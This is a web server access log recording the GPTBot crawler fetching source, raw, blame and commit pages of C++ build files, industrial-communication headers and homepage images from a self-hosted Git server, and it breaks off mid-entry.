- GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33667] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33665] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43103] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42453] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42451] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42453] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12932] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12803] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" +[17/Feb/2026:17:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=source" [Client 74.7.227.38] [Length 526143] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:17:37:31 +0000] - 200 200 - GET https 